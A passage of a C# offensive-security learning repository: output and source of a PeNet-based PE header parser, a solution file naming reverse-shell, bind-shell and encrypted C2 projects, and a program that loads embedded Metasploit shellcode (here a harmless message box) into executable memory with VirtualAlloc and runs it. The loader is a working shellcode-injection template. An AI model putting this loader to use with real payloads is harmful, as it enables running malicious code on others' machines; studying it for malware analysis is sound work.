6 | [+] Date and time of image creation: 26-08-2067 08:17:57
7 | [+] Number of Symbols: 0
8 | [+] File Characteristrics: ExecutableImage, LargeAddressAware
9 | [!] Optional Header
10 | [+] Magic: Bit32
11 | [+] Linker Version: 48.0
12 | [+] Size of Code: 14336
13 | [+] Size of Initialized Data: 2048
14 | [+] Size of Uninitialized Data: 0
15 | [+] Address of Entrypoint: 0x0000561A
16 | [+] Base of Code (RVA): 0x00002000
17 | [+] Base of Code (VA): 0x0000000000402000
18 | [+] Base of Image Loading (VA): 0x0000000000400000
19 | [+] Section Alignment: 8192
20 | [+] File Alignment: 512
21 | [+] Operating System Version Required: 4.0
22 | [+] Image Version Required: 0.0
23 | [+] Subsystem Version to Execute File: 4.0
24 | [+] Size of Image File: 40960
25 | [+] Size of all Headers: 512
26 | [+] Subsystem Required to Execute: WindowsCui
27 | [+] Dll Characteristics of Image: 34144
28 | [+] Size of Stack Commit and Reserve: 4096 1048576
29 | [+] Size of Heap Commit and Reserve: 4096 1048576
30 | [+] Number of Directory Entries: 16
31 | [!] Imported Functions
32 | [+] Function Name: _CorExeMain
33 | DLL: mscoree.dll
34 | IAT Offset: 0
35 | [!] Resource Directories
36 | [+] Characteristics: 0x00000000
37 | [+] Version: 0.0
38 | [+] Total Entries: 2
39 | [!] Data Entries
40 | [+] ID: 16 Name: Version
41 | Entry Type: ID Entry
42 | Data is Directory: True
43 | [+] ID: 24 Name: Manifest
44 | Entry Type: ID Entry
45 | Data is Directory: True
46 |
--------------------------------------------------------------------------------
/PE Analysis Using PeNet/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Linq;
3 | using System.Diagnostics;
4 | using PeNet;
5 |
6 | static class Utils {
7 |
8 | ///
9 | /// Convert hex bytes to string
10 | ///
11 | ///
12 | ///
13 | public static string Hexify(byte[] b) {
14 | string[] hex = BitConverter.ToString(b).Split("-").Reverse().ToArray();
15 | return "0x" + string.Join("", hex);
16 | }
17 | }
18 |
19 | class Program {
20 |
21 | static void Main(string[] args) {
22 | // safeguard arguments
23 | if (args.Length == 0) {
24 | Console.Error.WriteLine("Usage: '{0}' ", Process.GetCurrentProcess().MainModule.ModuleName);
25 | Environment.Exit(1);
26 | }
27 |
28 | // check if it is a PE file
29 | if (!PeFile.IsPeFile(args[0])) {
30 | Console.Error.WriteLine("[x] '{0}' is not a valid PE file.", args[0]);
31 | Environment.Exit(1);
32 | }
33 |
34 | var pe = new PeFile(args[0]);
35 |
36 | // ==================================
37 | // Image NT Headers (PE File Only)
38 | // ==================================
39 | Console.WriteLine("[!] PE File Header");
40 | var fh = pe.ImageNtHeaders.FileHeader;
41 | Console.WriteLine("\t[+] Machine Type: {0}", fh.Machine);
42 | Console.WriteLine("\t[+] Number of Sections: {0}", fh.NumberOfSections);
43 | Console.WriteLine("\t[+] Date and time of image creation: {0}", new DateTime(1970, 01, 01, 0, 0, 0).AddSeconds(fh.TimeDateStamp).ToString());
44 | Console.WriteLine("\t[+] Number of Symbols: {0}", fh.NumberOfSymbols);
45 | Console.WriteLine("\t[+] File Characteristrics: {0}", fh.Characteristics);
46 |
47 | Console.WriteLine("[!] Optional Header");
48 | var oh = pe.ImageNtHeaders.OptionalHeader;
49 | Console.WriteLine("\t[+] Magic: {0}", oh.Magic);
50 | Console.WriteLine("\t[+] Linker Version: {0}.{1}", oh.MajorLinkerVersion, oh.MinorLinkerVersion);
51 | Console.WriteLine("\t[+] Size of Code: {0}", oh.SizeOfCode);
52 | Console.WriteLine("\t[+] Size of Initialized Data: {0}", oh.SizeOfInitializedData);
53 | Console.WriteLine("\t[+] Size of Uninitialized Data: {0}", oh.SizeOfUninitializedData);
54 | Console.WriteLine("\t[+] Address of Entrypoint: {0}", Utils.Hexify(BitConverter.GetBytes(oh.AddressOfEntryPoint)));
55 | Console.WriteLine("\t[+] Base of Code (RVA): {0}", Utils.Hexify(BitConverter.GetBytes(oh.BaseOfCode)));
56 | Console.WriteLine("\t[+] Base of Code (VA): {0}", Utils.Hexify(BitConverter.GetBytes(oh.BaseOfCode + oh.ImageBase)));
57 | Console.WriteLine("\t[+] Base of Image Loading (VA): {0}", Utils.Hexify(BitConverter.GetBytes(oh.ImageBase)));
58 | Console.WriteLine("\t[+] Section Alignment: {0}", oh.SectionAlignment);
59 | Console.WriteLine("\t[+] File Alignment: {0}", oh.FileAlignment);
60 | Console.WriteLine("\t[+] Operating System Version Required: {0}.{1}", oh.MajorOperatingSystemVersion, oh.MinorOperatingSystemVersion);
61 | Console.WriteLine("\t[+] Image Version Required: {0}.{1}", oh.MajorImageVersion, oh.MinorImageVersion);
62 | Console.WriteLine("\t[+] Subsystem Version to Execute File: {0}.{1}", oh.MajorSubsystemVersion, oh.MinorSubsystemVersion);
63 | Console.WriteLine("\t[+] Size of Image File: {0}", oh.SizeOfImage);
64 | Console.WriteLine("\t[+] Size of all Headers: {0}", oh.SizeOfHeaders);
65 | Console.WriteLine("\t[+] Subsystem Required to Execute: {0}", oh.Subsystem);
66 | Console.WriteLine("\t[+] Dll Characteristics of Image: {0}", oh.DllCharacteristics);
67 | Console.WriteLine("\t[+] Size of Stack Commit and Reserve: {0}\t{1}", oh.SizeOfStackCommit, oh.SizeOfStackReserve);
68 | Console.WriteLine("\t[+] Size of Heap Commit and Reserve: {0}\t{1}", oh.SizeOfHeapCommit, oh.SizeOfHeapReserve);
69 | Console.WriteLine("\t[+] Number of Directory Entries: {0}", oh.NumberOfRvaAndSizes);
70 |
71 | // ==================================
72 | // Available Data Directories
73 | // (If it is not present, the contents and title will be skipped)
74 | // ==================================
75 | if (pe.ExportedFunctions !=null && pe.ExportedFunctions.Length > 0)
76 | {
77 | Console.WriteLine("[!] Exported Functions");
78 | foreach (var f in pe.ExportedFunctions)
79 | {
80 | Console.WriteLine("\t[+] Function Name: {0}", f.Name);
81 | Console.WriteLine("\t Ordinal Number: {0}", f.Ordinal);
82 | Console.WriteLine("\t Address: {0}", f.Address.ToHexString());
83 | }
84 | }
85 |
86 | if (pe.ImportedFunctions != null && pe.ImportedFunctions.Length > 0)
87 | {
88 | Console.WriteLine("[!] Imported Functions");
89 | foreach (var f in pe.ImportedFunctions)
90 | {
91 | Console.WriteLine("\t[+] Function Name: {0}", f.Name);
92 | Console.WriteLine("\t DLL: {0}", f.DLL);
93 | Console.WriteLine("\t IAT Offset: {0}", f.IATOffset);
94 | }
95 | }
96 |
97 | if (pe.ImageResourceDirectory != null)
98 | {
99 | Console.WriteLine("[!] Resource Directories");
100 | Console.WriteLine("\t[+] Characteristics: {0}", pe.ImageResourceDirectory.Characteristics.ToHexString());
101 | Console.WriteLine("\t[+] Version: {0}.{1}", pe.ImageResourceDirectory.MajorVersion, pe.ImageResourceDirectory.MinorVersion);
102 | Console.WriteLine("\t[+] Total Entries: {0}", pe.ImageResourceDirectory.NumberOfIdEntries + pe.ImageResourceDirectory.NumberOfNameEntries);
103 | Console.WriteLine("\t[!] Data Entries");
104 |
105 | foreach (var e in pe.ImageResourceDirectory.DirectoryEntries)
106 | {
107 | Console.WriteLine("\t\t[+] ID: {0}\t\tName: {1}", e.ID, e.NameResolved);
108 | Console.WriteLine("\t\t Entry Type: {0}", e.IsIdEntry ? "ID Entry" : e.IsNamedEntry ? "Named Entry" : "Unknown");
109 | Console.WriteLine("\t\t Data is Directory: {0}", e.DataIsDirectory);
110 | }
111 | }
112 |
113 | if(pe.ExceptionDirectory.Length > 0)
114 | {
115 | Console.WriteLine("[!] Exception Directory");
116 | foreach (var e in pe.ExceptionDirectory)
117 | {
118 | Console.WriteLine("\t[+] Function Start: {0}\t\tFunction End: {1}", e.FunctionStart.ToHexString(), e.FunctionEnd.ToHexString());
119 | Console.WriteLine("\t Unwind Information");
120 | Console.WriteLine("\t \tVersion: {0}\t\tFlags: {1}", e.ResolvedUnwindInfo.Version, e.ResolvedUnwindInfo.Flags);
121 | Console.WriteLine("\t \tFunction Entry: {0}", e.ResolvedUnwindInfo.FunctionEntry.ToHexString());
122 | Console.WriteLine("\t \tCount of Codes: {0}", e.ResolvedUnwindInfo.CountOfCodes);
123 | Console.WriteLine("\t \tUnwind Codes: {0} entries", e.ResolvedUnwindInfo.UnwindCode.Length);
124 | foreach (var c in e.ResolvedUnwindInfo.UnwindCode)
125 | {
126 | Console.WriteLine("\t \t \tUnwind Operation: {0}", c.UnwindOp);
127 | Console.WriteLine("\t \t \tFrame Offset: {0}\t\tCode Offset: {1}", c.FrameOffset.ToHexString(), c.CodeOffset.ToHexString());
128 | }
129 | }
130 | }
131 |
132 | if(pe.ImageRelocationDirectory.Length > 0)
133 | {
134 | Console.WriteLine("[!] Relocation Directory");
135 | foreach (var e in pe.ImageRelocationDirectory)
136 | {
137 | Console.WriteLine("\t[+] Size of Block: {0}\t\tVirtual Address: {1}", e.SizeOfBlock.ToHexString(), e.VirtualAddress.ToHexString());
138 | Console.WriteLine("\t Type Offsets: {0} entries", e.TypeOffsets.Length);
139 | foreach (var t in e.TypeOffsets)
140 | {
141 | Console.WriteLine("\t \tOffset: {0}\t\tType: {1}", t.Offset.ToHexString(), t.Type);
142 | }
143 | }
144 | }
145 |
146 | if(pe.ImageDebugDirectory.Length > 0)
147 | {
148 | Console.WriteLine("[!] Debug Directory");
149 | foreach (var e in pe.ImageDebugDirectory)
150 | {
151 | Console.WriteLine("\t[+] Size of Data: {0}\t\tPointer to Raw Data: {1}", e.SizeOfData.ToHexString(), e.PointerToRawData.ToHexString());
152 | Console.WriteLine("\t Version: {0}.{1}\t\t\t\tType: {2}", e.MajorVersion, e.MinorVersion, e.Type);
153 | Console.WriteLine("\t Characteristics: {0}\t\tAddress of Raw Data: {1}", e.Characteristics.ToHexString(), e.AddressOfRawData.ToHexString());
154 | }
155 | }
156 |
157 | if (pe.ImageTlsDirectory != null)
158 | {
159 | Console.WriteLine("[!] TLS Directory");
160 | Console.WriteLine("\t[+] Characteristics: {0}", pe.ImageTlsDirectory.Characteristics);
161 | Console.WriteLine("\t[+] Address of Callbacks: {0}", pe.ImageTlsDirectory.AddressOfCallBacks.ToHexString());
162 | Console.WriteLine("\t[+] Address of Index: {0}", pe.ImageTlsDirectory.AddressOfIndex.ToHexString());
163 | Console.WriteLine("\t[+] Start of Raw Data: {0}\t\tEnd of Raw Data: {1}", pe.ImageTlsDirectory.StartAddressOfRawData.ToHexString(), pe.ImageTlsDirectory.EndAddressOfRawData);
164 | Console.WriteLine("\t[+] Size of ZeroFile: {0}", pe.ImageTlsDirectory.SizeOfZeroFill);
165 | if (pe.ImageTlsDirectory.TlsCallbacks.Length > 0)
166 | {
167 | Console.WriteLine("\t[+] TLS Callbacks: {0} entries", pe.ImageTlsDirectory.TlsCallbacks.Length);
168 | foreach (var c in pe.ImageTlsDirectory.TlsCallbacks)
169 | {
170 | Console.WriteLine("\t\t{0}", c.Callback.ToHexString());
171 | }
172 | }
173 | }
174 |
175 | if(pe.ImageLoadConfigDirectory != null)
176 | {
177 | Console.WriteLine("[!] Load Config Directory");
178 | Console.WriteLine("\t[+] Size: {0}\t\tEdit List: {1}", pe.ImageLoadConfigDirectory.Size, pe.ImageLoadConfigDirectory.EditList);
179 | Console.WriteLine("\t[+] Critial Section Default Timeout: {0}", pe.ImageLoadConfigDirectory.CriticalSectionDefaultTimeout);
180 | Console.WriteLine("\t[+] Commit Free Block Threshold: {0}\t\tCommit Total Free Threshold: {1}", pe.ImageLoadConfigDirectory.DeCommitFreeBlockThreshold, pe.ImageLoadConfigDirectory.DeCommitTotalFreeThreshold);
181 | Console.WriteLine("\t[+] Version: {0}.{1}", pe.ImageLoadConfigDirectory.MajorVesion, pe.ImageLoadConfigDirectory.MinorVersion);
182 | }
183 |
184 | if(pe.ImageBoundImportDescriptor != null)
185 | {
186 | Console.WriteLine("[!] Bound Import Directory");
187 | Console.WriteLine("\t[+] Number of Module Forwarder Refs: {0}", pe.ImageBoundImportDescriptor.NumberOfModuleForwarderRefs);
188 | Console.WriteLine("\t[+] Offset Module Name: {0}", pe.ImageBoundImportDescriptor.OffsetModuleName);
189 | }
190 |
191 |
192 | // ==================================
193 | // Image Section Headers
194 | // ==================================
195 | if (pe.ImageSectionHeaders != null && pe.ImageSectionHeaders.Length > 0)
196 | {
197 | Console.WriteLine("[!] Sections");
198 | foreach (var s in pe.ImageSectionHeaders)
199 | {
200 | Console.WriteLine("\t[!] Name: {0}", s.Name);
201 | Console.WriteLine("\t Virtual Size: {0}", s.VirtualSize.ToHexString());
202 | Console.WriteLine("\t Characteristics: {0}", s.Characteristics);
203 | }
204 | }
205 | }
206 | }
207 |
--------------------------------------------------------------------------------
/PInvoke MSF Payload/PInvoke MSF Payload.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 | PInvoke_MSF_Payload
7 | AnyCPU;ARM32;ARM64;x64;x86
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/PInvoke MSF Payload/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | class Program {
5 | /*
6 | * windows/x64/messagebox - 290 bytes
7 | * https://metasploit.com/
8 | * VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
9 | * TITLE=Hacked!, TEXT=Hello T3r@byt3, ICON=NO
10 | */
11 | static byte[] buf = new byte[290] {
12 | 0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
13 | 0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
14 | 0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
15 | 0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
16 | 0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
17 | 0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
18 | 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
19 | 0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
20 | 0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
21 | 0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
22 | 0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
23 | 0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
24 | 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
25 | 0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
26 | 0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
27 | 0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
28 | 0x85,0x0d,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
29 | 0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x65,0x6c,
30 | 0x6c,0x6f,0x20,0x54,0x33,0x72,0x40,0x62,0x79,0x74,0x33,0x00,0x48,0x61,0x63,
31 | 0x6b,0x65,0x64,0x21,0x00 };
32 |
33 | // declaring VirtualAlloc function from kernel32.dll
34 | [DllImport("kernel32.dll")]
35 | static extern IntPtr VirtualAlloc(IntPtr address, uint dwSize, uint allocType, uint mode);
36 |
37 | // create delegate signature for executor function
38 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
39 | delegate void WindowRun();
40 |
41 | static void Main() {
42 | // get pointer of allocated buffer
43 | IntPtr ptr = VirtualAlloc(IntPtr.Zero, Convert.ToUInt32(buf.Length), 0x1000, 0x40);
44 |
45 | // write the buffer into memory
46 | Marshal.Copy(buf, 0x0, ptr, buf.Length);
47 |
48 | // get function pointer of the allocated buffer
49 | WindowRun r = Marshal.GetDelegateForFunctionPointer(ptr);
50 |
51 | // execute shellcode
52 | r();
53 | }
54 | }
55 |
--------------------------------------------------------------------------------
/Source Code.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31624.102
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "TCP Reverse Shell", "TCP Reverse Shell\TCP Reverse Shell.csproj", "{1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}"
7 | EndProject
8 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "TCP Bind Shell", "TCP Bind Shell\TCP Bind Shell.csproj", "{573F42B5-48A3-4002-9C17-E5934E21BC30}"
9 | EndProject
10 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "PInvoke MSF Payload", "PInvoke MSF Payload\PInvoke MSF Payload.csproj", "{97DC7BD8-F662-438F-A71D-263C58C5B21C}"
11 | EndProject
12 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "Encrypted C2C", "Encryped C2C\Encrypted C2C.csproj", "{EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}"
13 | EndProject
14 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{C6D5E090-876A-4C2F-8B20-A7E6D789DD44}"
15 | ProjectSection(SolutionItems) = preProject
16 | .editorconfig = .editorconfig
17 | EndProjectSection
18 | EndProject
19 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PE Analysis Using PeNet", "PE Analysis Using PeNet\PE Analysis Using PeNet.csproj", "{31E72EA2-4BEF-415A-993E-8C736DC299DA}"
20 | EndProject
21 | Global
22 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
23 | Debug|Any CPU = Debug|Any CPU
24 | Debug|ARM32 = Debug|ARM32
25 | Debug|ARM64 = Debug|ARM64
26 | Debug|x64 = Debug|x64
27 | Debug|x86 = Debug|x86
28 | Release|Any CPU = Release|Any CPU
29 | Release|ARM32 = Release|ARM32
30 | Release|ARM64 = Release|ARM64
31 | Release|x64 = Release|x64
32 | Release|x86 = Release|x86
33 | EndGlobalSection
34 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
35 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
36 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|Any CPU.Build.0 = Debug|Any CPU
37 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|ARM32.ActiveCfg = Debug|ARM32
38 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|ARM32.Build.0 = Debug|ARM32
39 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|ARM64.ActiveCfg = Debug|ARM64
40 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|ARM64.Build.0 = Debug|ARM64
41 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|x64.ActiveCfg = Debug|x64
42 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|x64.Build.0 = Debug|x64
43 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|x86.ActiveCfg = Debug|x86
44 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Debug|x86.Build.0 = Debug|x86
45 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|Any CPU.ActiveCfg = Release|Any CPU
46 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|Any CPU.Build.0 = Release|Any CPU
47 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|ARM32.ActiveCfg = Release|ARM32
48 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|ARM32.Build.0 = Release|ARM32
49 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|ARM64.ActiveCfg = Release|ARM64
50 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|ARM64.Build.0 = Release|ARM64
51 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|x64.ActiveCfg = Release|x64
52 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|x64.Build.0 = Release|x64
53 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|x86.ActiveCfg = Release|x86
54 | {1D8B5C8C-6918-4A3D-8C33-7C0DDD5F562C}.Release|x86.Build.0 = Release|x86
55 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
56 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|Any CPU.Build.0 = Debug|Any CPU
57 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|ARM32.ActiveCfg = Debug|ARM32
58 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|ARM32.Build.0 = Debug|ARM32
59 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|ARM64.ActiveCfg = Debug|ARM64
60 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|ARM64.Build.0 = Debug|ARM64
61 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|x64.ActiveCfg = Debug|x64
62 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|x64.Build.0 = Debug|x64
63 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|x86.ActiveCfg = Debug|x86
64 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Debug|x86.Build.0 = Debug|x86
65 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|Any CPU.ActiveCfg = Release|Any CPU
66 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|Any CPU.Build.0 = Release|Any CPU
67 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|ARM32.ActiveCfg = Release|ARM32
68 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|ARM32.Build.0 = Release|ARM32
69 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|ARM64.ActiveCfg = Release|ARM64
70 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|ARM64.Build.0 = Release|ARM64
71 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|x64.ActiveCfg = Release|x64
72 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|x64.Build.0 = Release|x64
73 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|x86.ActiveCfg = Release|x86
74 | {573F42B5-48A3-4002-9C17-E5934E21BC30}.Release|x86.Build.0 = Release|x86
75 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
76 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|Any CPU.Build.0 = Debug|Any CPU
77 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|ARM32.ActiveCfg = Debug|ARM32
78 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|ARM32.Build.0 = Debug|ARM32
79 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|ARM64.ActiveCfg = Debug|ARM64
80 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|ARM64.Build.0 = Debug|ARM64
81 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|x64.ActiveCfg = Debug|x64
82 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|x64.Build.0 = Debug|x64
83 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|x86.ActiveCfg = Debug|x86
84 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Debug|x86.Build.0 = Debug|x86
85 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|Any CPU.ActiveCfg = Release|Any CPU
86 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|Any CPU.Build.0 = Release|Any CPU
87 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|ARM32.ActiveCfg = Release|ARM32
88 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|ARM32.Build.0 = Release|ARM32
89 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|ARM64.ActiveCfg = Release|ARM64
90 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|ARM64.Build.0 = Release|ARM64
91 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|x64.ActiveCfg = Release|x64
92 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|x64.Build.0 = Release|x64
93 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|x86.ActiveCfg = Release|x86
94 | {97DC7BD8-F662-438F-A71D-263C58C5B21C}.Release|x86.Build.0 = Release|x86
95 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
96 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|Any CPU.Build.0 = Debug|Any CPU
97 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|ARM32.ActiveCfg = Debug|ARM32
98 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|ARM32.Build.0 = Debug|ARM32
99 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|ARM64.ActiveCfg = Debug|ARM64
100 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|ARM64.Build.0 = Debug|ARM64
101 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|x64.ActiveCfg = Debug|x64
102 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|x64.Build.0 = Debug|x64
103 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|x86.ActiveCfg = Debug|x86
104 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Debug|x86.Build.0 = Debug|x86
105 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|Any CPU.ActiveCfg = Release|Any CPU
106 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|Any CPU.Build.0 = Release|Any CPU
107 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|ARM32.ActiveCfg = Release|ARM32
108 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|ARM32.Build.0 = Release|ARM32
109 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|ARM64.ActiveCfg = Release|ARM64
110 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|ARM64.Build.0 = Release|ARM64
111 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|x64.ActiveCfg = Release|x64
112 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|x64.Build.0 = Release|x64
113 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|x86.ActiveCfg = Release|x86
114 | {EDE1FCB6-29BA-4E0B-BEA4-44034C37FCB2}.Release|x86.Build.0 = Release|x86
115 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
116 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|Any CPU.Build.0 = Debug|Any CPU
117 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|ARM32.ActiveCfg = Debug|Any CPU
118 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|ARM32.Build.0 = Debug|Any CPU
119 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|ARM64.ActiveCfg = Debug|Any CPU
120 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|ARM64.Build.0 = Debug|Any CPU
121 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|x64.ActiveCfg = Debug|Any CPU
122 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|x64.Build.0 = Debug|Any CPU
123 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|x86.ActiveCfg = Debug|Any CPU
124 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Debug|x86.Build.0 = Debug|Any CPU
125 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|Any CPU.ActiveCfg = Release|Any CPU
126 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|Any CPU.Build.0 = Release|Any CPU
127 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|ARM32.ActiveCfg = Release|Any CPU
128 | {31E72EA2-4BEF-415A-993E-8C736DC299DA}.Release|ARM32.Build.0 = Release|Any CPU
